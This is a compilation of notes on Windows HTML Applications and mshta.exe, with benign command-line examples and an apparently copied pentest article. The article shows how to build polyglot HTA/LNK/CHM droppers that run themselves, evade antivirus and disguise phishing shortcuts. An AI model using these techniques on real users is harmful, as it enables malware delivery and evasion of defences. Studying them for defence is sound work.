mshta Notes
http://www.voidcn.com/article/p-bhilyzkf-bpx.html
What is HTA
An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.
The HTML is used to generate the user interface, and the scripting language is used for the program logic.
An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application.
The usual file extension of an HTA is .hta.
HTAs give the developer the features of HTML together with the advantages of scripting languages.
An HTA is treated like any executable file with extension .exe.
When executed via mshta.exe (or if the file icon is double-clicked), it runs immediately.
When executed remotely via the browser, the user is asked once, before the HTA is downloaded, whether or not to save or run the application; if saved, it can simply be run on demand after that.
The HTA engine (mshta.exe) is dependent on Internet Explorer.
Starting from Windows Vista, a user can remove Internet Explorer from Windows, which will cause the HTA engine to stop working.
HTAs are fully supported in Internet Explorer from versions 5 to 9.
Further versions, such as 10 and 11, still support HTAs though with some minor features turned off.[citation needed]
Security considerations
When a regular HTML file is executed, the execution is confined to the security model of the web browser.
This means it is confined to communicating with the server, manipulating the page's object model (usually to validate forms and/or create interesting visual effects) and reading or writing cookies.
On the other hand, an HTA runs as a fully trusted application and therefore has more privileges than a normal HTML file; for example, an HTA can create, edit and remove files and registry entries.
Although HTAs run in this 'trusted' environment, querying Active Directory can be subject to Internet Explorer Zone logic and associated error messages.
Development
To customize the appearance of an HTA, an optional tag hta:application was introduced to the HEAD section.
This tag exposes a set of attributes that enable control of border style, the program icon, etc., and provide information such as the argument (command line) used to launch the HTA. Otherwise, an HTA has the same format as an HTML page.
Any text editor can be used to create an HTA.
Editors with special features for developing HTML applications may be obtained from Microsoft or from third-party sources.
An existing HTML file (with file extension .htm or .html, for example) can be changed to an HTA by simply changing the extension to .hta.
Vulnerabilities
HTA have been used to deliver malware.
Example
<HTML>
<HEAD>
<HTA:APPLICATION ID="HelloExample"
BORDER="thick"
BORDERSTYLE="complex"/>
<TITLE>HTA - Hello World</TITLE>
</HEAD>
<BODY>
<H2>HTA - Hello World</H2>
</BODY>
</HTML>
mshta is short for MicroSoft Html Application.
It could run html file or html string as a parameter.
what is interesting is you can use it in a batch command or batch file and you can use some functions like in the browser such as show a dialog and so on.
with mshta you can run javascript code and vbscipt code in windows command line or batch file.
Notes:
mshta cannot link local file
followings works in cmd mode but not in windows run mode and so not in R mode
mshta "about:<img src='http://charts.aastocks.com/servlet/Charts?fontsize=12&15MinDelay=F&lang=1&titlestyle=1&vol=1&Indicator=3&indpara1=3&indpara2=6&indpara3=9&indpara4=12&indpara5=15&subChart2=3&ref2para1=12&ref2para2=26&ref2para3=9&subChart3=12&ref3para1=0&ref3para2=0&ref3para3=0&scheme=3&com=100&chartwidth=680&chartheight=400&stockid=110000&period=7&type=1&logoStyle=1'>"
show a message box in many different ways.
mshta javascript:window.execScript("msgBox('hello world!'):window.close","vbs")
mshta javascript:alert("hello world!");close()
mshta vbscript:window.execScript("alert('hello world!');close()","javascript")
mshta vbscript:window.execScript("msgBox('hello world!'):window.close","vbs")
mshta vbscript:msgbox("hello world!",64,"Title")(window.close)
mshta vbscript:CreateObject("Wscript.Shell").popup("hello world!",7,"Title",64)(window.close)
execute more than one commands in one line.
(In fact this already shows in you must find it, it is the close command.)
mshta javascript:alert("BOX one");alert("BOX two");close()
mshta javascript:execScript("msgBox('BOX one'):msgBox('BOX two'):window.close","vbs")
mshta vbscript:execute("msgbox ""BOX one"":msgbox ""BOX two"":window.close")
mshta vbscript:(msgbox("BOX one"))(msgbox("BOX two")(window.close))
use ActiveXObject in script to use more sophisticated functions of the OS.
mshta vbscript:createobject("sapi.spvoice").speak("Hello, I am tom, let's do something fun.")(window.close)
mshta "javascript:close((V=(v=new ActiveXObject('SAPI.SpVoice')).GetVoices()).count&&v.Speak('Hello! I am '+V(0).GetAttribute('Gender')))"
javascript is much more easy to use,
because you do not have to add so many double qoutes like in vbscript.
mshta "javascript:var objFSO=new ActiveXObject('Scripting.FileSystemObject'); var objFile = objFSO.CreateTextFile('test.txt',true); objFile.Write('Hello World.');objFile.Close();close();"
mshta "javascript:var sh=new ActiveXObject( 'WScript.Shell' ); sh.Popup( 'hello world!', 10, 'Title!', 64 );close()"
several ways to calculate the free memory of your computer.
mshta "javascript:close(new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).Write(GetObject('winmgmts:').ExecQuery('Select * from Win32_PerfFormattedData_PerfOS_Memory').ItemIndex(0).AvailableBytes));"|more
for /f "usebackq" %a in (`mshta ^"javascript^:close^(new ActiveXObject^(^'Scripting.FileSystemObject^'^).GetStandardStream^(1^).Write^(GetObject^(^'winmgmts:^'^).ExecQuery^(^'Select * from Win32_PerfFormattedData_PerfOS_Memory^'^).ItemIndex^(0^).AvailableBytes^)^);^"^|more`) do set free_mem=%a
mshta "javascript:close(new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).Write(GetObject('winmgmts:').ExecQuery('Select * from Win32_PerfFormattedData_PerfOS_Memory').ItemIndex(0).AvailableMBytes));"|for /f %%a in ('more') do set free_mem=%%a
another way to calculate free memory.
@echo off
setlocal
:: Define simple macros to support JavaScript within batch
set "beginJS=mshta "javascript:close(new ActiveXObject('Scripting.FileSystemObject'.GetStandardStream(1.Write(" set "endJS=));""
:: Direct instantiation requires that output is piped
%beginJS% GetObject('winmgmts:'.ExecQuery('Select * from Win32_PerfFormattedData_PerfOS_Memory'.ItemIndex(0.AvailableBytes%endJS% | findstr "^"
:: FOR /F does not need pipe
for /f %%N in ( '%beginJS% GetObject('winmgmts:'.ExecQuery('Select * from Win32_PerfFormattedData_PerfOS_Memory'.ItemIndex(0.AvailableBytes %endJS%' ) do set free_mem=%%N echo free_mem=%free_mem%
show color pallets dialog.
mshta "about:<script>function b(){new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).Write(d.ChooseColorDlg().toString(16));close();}<script><body onload='b()'><object id='d' classid='clsid:3050f819-98b5-11cf-bb82-00aa00bdce0b'></object></body>"|more
show screen resolution.
mshta "javascript:res=screen.width+'x'+screen.height;alert(res);close();" 1 | more
use clipboard data.
for /f "usebackq tokens=1,* delims=[]" %i in (`mshta "javascript:close(new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).Write(clipboardData.getData(<'Text')));"^|find /v /n ""`) do @set "c[%i]=%j"
use javascript setTimeout to delay some time interval to execute a command.
mshta javascript:setTimeout('close()',10000)
show File Open Select Dialog,
you can redirect your output to the command window or to a file or to a variable.
mshta "about:<input type=file id=FILE><script>FILE.click();new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).WriteLine(FILE.value);close();resizeTo(0,0);</script>"|more
mshta "about:<input type=file id=FILE><script>FILE.click();new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).WriteLine(FILE.value);close();</script>">test.txt
mshta "about:<input type=file id=FILE><script>FILE.click();new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).WriteLine(FILE.value);close();</script>">temp && set /p a=<temp for /f "delims=" %%i in ('mshta "about:<input type=file id=FILE><script>FILE.click();new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).WriteLine(FILE.value);close();</script>"') do set a=%%i
Example 12,
show Open For Folder Dialog to select a directory, and you can assign it to a variable.
for /f "delims=" %%i in ('mshta "javascript:var folder=new ActiveXObject("Shell.Application").BrowseForFolder(0,'选择要处理的文件夹', 0, '').self.path;new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).WriteLine(folder);close();"') do set input=%%i
execute batch command with parameters which has spaces.
::a.bat
@echo off
set text=Hello World
mshta vbscript:createobject("WScript.Shell").Run("b.bat "+"""%text%""",0)(window.close)
::b.bat
@echo off
mshta "javascript:var sh=new ActiveXObject( 'WScript.Shell' ); sh.Popup( '%~1', 10, 'Title!', 64 ); close()"
ultimate function, run a html file.
<!--
:: Batch section @echo off setlocal echo Select an option: for /F "delims=" %%a in ('mshta.exe "%~F0"') do set "HTAreply=%%a" echo End of HTA window, reply: "%HTAreply%" goto :EOF -->
<HTML>
<HEAD>
<HTA:APPLICATION SCROLL="no" SYSMENU="no" >
<TITLE>HTA Radio Buttons</TITLE>
<SCRIPT language="JavaScript"> window.resizeTo(440,170); var reply = "No button selected"; function closeHTA(){ var fso = new ActiveXObject("Scripting.FileSystemObject"); fso.GetStandardStream(1).WriteLine(reply); window.close(); } </SCRIPT>
</HEAD>
<BODY>
<p>Which prize do you prefer?</p>
<label><input type="radio" name="prize" onclick="reply=this.value" value="House">House</label>
<label><input type="radio" name="prize" onclick="reply=this.value" value="Money">$1 million</label>
<label><input type="radio" name="prize" onclick="reply=this.value" value="None">No prize thanks, I'm already happy <b>:)</b></label>
<br><br>
<button onclick="closeHTA();">Submit</button>
</BODY>
</HTML>
Run HTA in hidden mode
options:
use windowstate="minimize" in HTA attributes
The app will still be shown on the taskbar while it runs so you can set showintaskbar to no but then you will see the window minimized small in the corner of the screen.
use window.resizeTo(0,0); with WINDOWSTATE="normal" but there will be a flicker of the window before it changes size.
using the WINDOWSTATE property
objShell.Run("%temp%\\readme.txt", 0, true);
window.close();
About HTA
The goal of this post is not to describe HTML Applications or HTA.
I will just give some basic info, if you want more, search for it or look into the msdn.
HTA basics
An HTA files is basically a desktop application which is based on HTML format.
Unlike online HTML, HTA system access is not restricted/sandboxed.
HTA dynamics are done via scripting, mainly JavaScript or Visual Basic Script.
Note: I am basing all my examples on Visual Basic Script since it is a format managed by macro_pack which I used for the proof of concepts below.
HTA files are well known by pentesters as one of those "retro" ways useful to bypass application whitelisting.
HTA files are also interesting to bypass antivirus because they are still not well detected.
Last but not least HTA are used in web phishing, replacing old Java Applet attacks (the downside being that only Internet Explorer will attempt to run HTA "Applet" inside an HTML page).
Here is an example of HTA file which was generated with macro_pack "HELLO" template.
echo sevagas | macro_pack.exe -t HELLO -G hello.hta
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
<script type="text/vbscript">
Private Sub Hello()
MsgBox "Hello from sevagas" & vbCrLf & "Remember to always be careful when you enable MS Office macros." & vbCrLf & "Have a nice day!"
End Sub
' Auto launch when VBA enabled
Sub AutoOpen()
Hello
End Sub
AutoOpen
Close
</script>
</head>
<body>
</body>
</html>
The HTA:APPLICATION tag is the mark of HTA application.
The attributes of the tag here are meant to generate a minimized window that does not show in taskbar.
Ignore the text talking about Office macro, HTA is not related to MS Office, you can use this file as a test file for the following examples.
Note: If you feel more "offensive" you can use other macro_pack templates such as the WEBMETER template (meterpreter over https).
See all options on macro_pack github.
Calling HTA from the command line
By default, HTA files can be called when you double click on them or with the command line.
The tool which runs HTA is mshta.exe.
You can find it in %windir%\system32\mshta.exe and %windir%\syswow64\mshta.exe.
mshta.exe recquires the full path to HTA application, so to call a HTA script in the current directory you can write:
mshta %cd%\myScript.hta
Playing with HTA extension
When HTA is called from the command line, mshta.exe will behave differently depending on the extension and the file format.
.html extension
If MSHTA runs an .html extension file containing HTML code with HTA application inside, it will run the HTA application but also execute HTML code.
This can generate errors when attempting to run some JavaScript code.
If you want to create a .htm file which can be called by both mshta.exe and a browser, put the HTA application in the header before it calls other scripts.
An be sure to close your application.
If you double click on the html file, it will open in browser.
The browsers I tested will all ignore the HTA application (Except Microsoft browsers).
If you run the html file with mshta.exe, your HTA application will be found, and run.
This behaviour is not very surprising as it is an HTA normal usecase (just the file ends with .html not .hta)
Pictures in HTA
HTA provides a way to embed a picture or an icon.
This is done by prepending the binary content of the image before the HTA code.
Here is how to do it
copy /b picture.ico+test.hta test_with_icon.hta
You also need to reference that icon in the HTA application tag
This is a normal usecase for HTA.
If extension is ".hta", mshta.exe will search the HTA application and run the script with icon in task bar.
If you rename file to ".ico" or other image extension, it will display the image in the HTA window and will not execute the script.
Some thinking...
If you combine what we saw in 1) and 2) we know that:
- An HTA script prepended by binary data is a valid HTA file
- mshta.exe seems to execute script for non image extension.
That is when you realise that mshta.exe enables universal polyglot of HTA.
Or how to turn any file into a visual basic script :)
Polyglot HTA file
It is easy to build files which are both valid when opened with MSHTA and other applications, and unlike polyglot wizardry you see from Ange Albertini in PoC, these files are really easy to build!
Polyglot HTA/PE file
We are going to test our assumption on an executable file (.exe extension)
copy /b %windir%\system32\calc.exe+test.hta calc2.exe
calc2.exe -> Runs good old calc
mshta %cd%\calc2.exe -> Execute HTA script!
So you can hide and run Visual Basic script in an executable binary!
Exercice:
Create an executable which calls itself with MSHTA to run the appended script.
Exercice (advanced):
Patch an existing executable with shellcode and HTA so that execution will run mshta.exe to execute the HTA script.
Polyglot HTA/LNK file
What is a MS windows shortcut (.lnk extension)?
Well basically Its a binary file which executes a command when you double click on it.
For now lets focus on the part "its a binary".
As we saw previously, mshta.exe will find and execute HTA scripts inside a binary.
Lets check that LNK file can be turned into polyglot HTA script.
This is how it’s done:
- First, create a shortcut (to a readme.txt file in the example)
- Next append HTA to the LNK file
copy /b readme.txt.lnk+test.hta readme2.txt.lnk
If you double click on shortcut, it will resolve and open the txt file.
But if you use MSHTA:
mshta %cd%\readme.txt.lnk -> Executes HTA script!
Other HTA polyglots
I hope you see where we are going ^^, but first, an easy polyglot exercise for the reader!
Exercise:
Make a shortcut to an image that is also an HTA script and a zip file
To prove it you must show that:- You can extract the shortcut file with unzip/7zip
- You can run the HTA part with mshta.exe
- You open the image if your double-click on the shortcut
It’s really easy!
HTA without .hta extension
What to do with malicious LNK file?
There is a history of LNK file used by APT and malware as an alternative to malicious Office documents.
This is because of the second part of windows shortcuts short definition:
Its a binary file which executes a command when you double click on it.
This article on blog.trendmicro describes various attacks relying on malicious LNK files.
Some of the attack scenarios done by APT:
- LNK -> CMD -> Powershell -> DROP RAT
- LNK -> remote SCT -> DROP RAT
- DOCx -> LNK -> remote HTA -> Powershell -> DROP RAT
I think these APT guys do not have a lot of imagination.
Instead of calling an HTA or SCT file over the Internet, why not just turn the LNK itself into an HTA application?
In fact, you can modify the LNK target in a way it will use MSHTA on itself and thus, execute the script.
That basically turns an LNK file into a self executable HTA file with a non .hta extension.
Before that, a simple polyglot exercise which does not involve HTA:
Exercise: Create a file which is both a ZIP file and LNK file (with .lnk extension).
The goal is to extract the zip archive when you double click on the shortcut (without any HTA code).
The magical picture trick!
If we combine everything it is possible to have phishing, cmd execution, HTA script, and dropped payload all in one file and without any access to the Internet!
Here is how it works:
Lets demonstrate that with a Magic trick!
Initial condition:
- You have one single shortcut in a folder,
- You have no internet access
- The shortcut is the only file on the folder
- No knowledge of anything else on the computer except it’s a windows OS.
The play:
- Double click on the shortcut ==> A picture will be displayed!
- When you close the picture window, the shortcut is gone and replaced by the picture file!!!
OK how to make this proof of concept: .
0) Get a picture, lets call it magic.png
1) Generate HTA dropper with macro_pack
echo "magic.jpg" | macro_pack.exe -t EMBED_EXE -e magic.jpg -o -G magic_dropper.hta
The EMBED_EXE template combined with -e option will embed the given file inside the HTA code.
At execution, the HTA code will drop the file, and execute it (which for a jpg file results in it being opened in the default image viewer).
Note: -o option is for obfuscation to prevent some annoying AV yelling.
2) Add self destruct routine
Edit magic_dropper.hta, go to the end of the file and add the next code between calls to "autoopen" and "close"
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
Set WshShell = CreateObject("WScript.Shell")
objFSO.DeleteFile window.document.location.pathname
Now the HTA file will delete itself after running.
2) Create magic.jpg.lnk LNK file
Create a shortcut (manually if you want) and call it magic.jpg in explorer (so its real name is magic.jpg.lnk)
3) Configure LNK file
Right click on LNK to modify its properties.
As a target we could use:
%windir%\System32\mshta.exe <fullpath>\magic.jpg.lnk
But it’s less versatile and we do not know the file path where the shortcut will be executed for your demo.
Lets rather use cmd:
%windir%\system32\cmd.exe /c start " "mshta" "%CD%\magic.jpg.lnk"
Next, change the LNK icon to something related to an image (find one or just use an icon in %windir%\system32\shell32.dll).
4) Append HTA to link for polyglot magic
copy /b magic.jpg.lnk+magic_dropper.hta magic.jpg.lnk
Your magic demo is ready, put the LNK anywhere on another PC and double click on the symlink :)
If you want to a more "weaponized" phishing application around HTA and LNK, you can "obfuscate" the shortcut command by using something like:
%windir%\system32\cmd.exe /c start " "mshta" "%CD%\lol.magic.lnk" E:\web_content\index_files\magic.png
This will hide the mshta part to someone who looks at the LNK parameters
.
The polyglot help file trick
So we saw we could run an HTA file disguised as a shortcut, now lets do the same with a help file (.chm)!
A help file can be build with Microsoft HTML Help Workshop
To build a CHM file, first you need an HTML help project (.hhp) file which is a text configuration file.
See msdn for more information.
Here is an example of .hpp file:
[OPTIONS]
Compatibility=1.1 or later
Compiled file=hello.chm
Default topic=hello.htm
Display compile progress=No
Language=0x410 Italian (Italy)
[FILES]
hello.htm
[INFOTYPES]
The file contains various configuration settings.
hello.chm will be the name of the created help file.
The HTML source file which will be used is "hello.htm"
Here is the content of the hello.htm file:
<html>
<title> Hello World! </title>
<head>
</head>
<body>
<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",cmd,/c mshta %CD%\hello.chm">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>
<h2 align=center> CHM Example </h2>
<p><h3 align=center> This is a malicious CHM file </h3></p>
</body>
</html
This file contains a shortcut which will call the command cmd /c mshta %CD%\hello.chm.
This shortcut is automatically triggered when the file is opened.
This means the help file will run MSHTA on itself when it is opened :)
Next generate the CHM file.
You can do that in "HTML Help Workshop" (File->Compile).
To finalize the attack, lets append an HTA file to our generate help file:
copy /b hello.chm+hello.hta hello.chm
Now double click on your help file to check it worked!
Other self calling HTA
All binary file format which can be used to start a command line can be turned into a vaild autonomous HTA script.
Exercise: Make a MS Excel file with DDE field which calls MSHTA on itself to run an appended HTA script.
Final toughs
How to avoid malicious usage of polyglot HTA?
This "feature" could be prevented by requiring to have an HTA tag starting at the beginning of the file.
One problem for example is this would break compatibility with all current HTA which relies on images.
It is important to notice that attacking via malicious CHM, LNK, or HTA files is nothing new.
But these formats are generally overlooked in security awareness trainings.
Malicious LNK files in emails are generally flagged as SPAM/malware, but they can be very dangerous on a USB key, embedded in an Office document, or inside a ZIP file.
CHM file is less likely to be considered malicious and same for other potential dangerous formats.
For blue teams: Usually, if you don’t rely on HTA files, it is recommended to either disable all mshta binaries using application whitelisting or to link the .hta extension to notepad.
This article showed that disabling .hta extension does not work.
must include tag
In HTA, to get the code to properly work, you must include the tag
<meta http-equiv="x-ua-compatible" content="ie=edge" /> or
<meta http-equiv="x-ua-compatible" content="ie=9">to get the JavaScript and HTML 5 to work completely. You may add
<HTA:APPLICATION
APPLICATIONNAME="HTA"
ID="HTA"
VERSION="1.0"
MAXIMIZEBUTTON="no"/>
The Basic Concept
HTA understands everything the browser understands including HTML and CSS code.
The HTA File
<HTA:APPLICATION
border="thin"
borderStyle="normal"
caption="yes"
icon="http://www.htmlgoodies.com/favicon.ico"
maximizeButton="yes"
minimizeButton="yes"
showInTaskbar="no"
windowState="maximize"
innerBorder="yes"
navigable="yes"
scroll="auto"
scrollFlat="yes" />
That's the tag/attribute code that I've set up to alter the window that will contain the display of the HTA.
Now, go ahead and download the HTA file by clicking on the link below.
You'll get the familiar box asking if you'd like to download the file.
Say "yes" and download it where you can quickly find it.
Once you've got it, go the file on your hard drive.
The icon will be the little flying window logo.
Click on it and up will come the viewer with this tutorial displayed just as I suggested in the code up above.
Once you've looked, come back and we'll look into what each of the elements does.
The Tag and Properties
Well, how did it look? My guess is that it looked just like this without all the orange swoosh and image stuff.
That was on purpose.
I didn't see a need to add it all into the code.
My guess is that all you really wanted was the text so that's all I gave.
Did you also get the little HG icon in the upper left-hand corner? If not, you must not have been attached to the Web when you viewed the HTA file.
I set the file so that it would go out on the Web and grab that icon
when displayed.
Again, the HTA:APPLICATION tag goes in between the HEAD tags.
Although it may not look like it up above, the tag does require a close tag.
That means you can use </HTA:APPLICATION> to close up the tag if you'd like.
I used a bit of shorthand suggested by the Microsoft pages.
Notice that I have a space and then a slash just before the >.
That's an easy way to say, "end".
You'll see that format being used a great deal in XML if you start getting into the language.
Where the tag really comes alive are all the properties (properties of the attribute "application") you can play with.
I've used just about every one up above that will alter the look of the display.
Notice how I have them listed, one after another and at least one space between each. I have a line break. It's the same thing.
No commas.
Put your tag together just the same way you see mine up above.
Here are the properties and what they do The default, what you'll get if you don't use the property, for each in green
border sets the border format.
Options: thin, dialog, none, thick
borderStyle further defines the border
Options: complex, normal, raised, static, sunken
caption denotes a title bar or not
Options: yes, no
icon is the path to an icon that will display in the title bar, not on the hard drive.
Options The icon must be 32X32 "ico" format.
I found it works pretty well if you have a favicon.ico on your system to attach to that.
That what I did above.
maximizeButton is the max button in the title bar
Options: yes, no
minimizeButton is the min button in the title bar
Options: yes, no
showInTaskbar tells if the application will display in the taskbar
Options: yes, no
windowState is how the window will display
Options: normal, minimize, maximize
innerBorder denotes if you'll have one or not
Options: yes, no
navigable suggests if linked pages will display in the HTA window or not
Options: yes, no
scroll denotes a scroll bar
Options: yes, no, auto
scrollFlat will the scrollbar be 3D or not
Options: yes, no
That's That
There are a few other properties and if you'd like to get into them, feel free.
The only properties I covered here are those that deal with the display, the design, of the HTA.
For some further reading, try the MSIE Web Workshop page.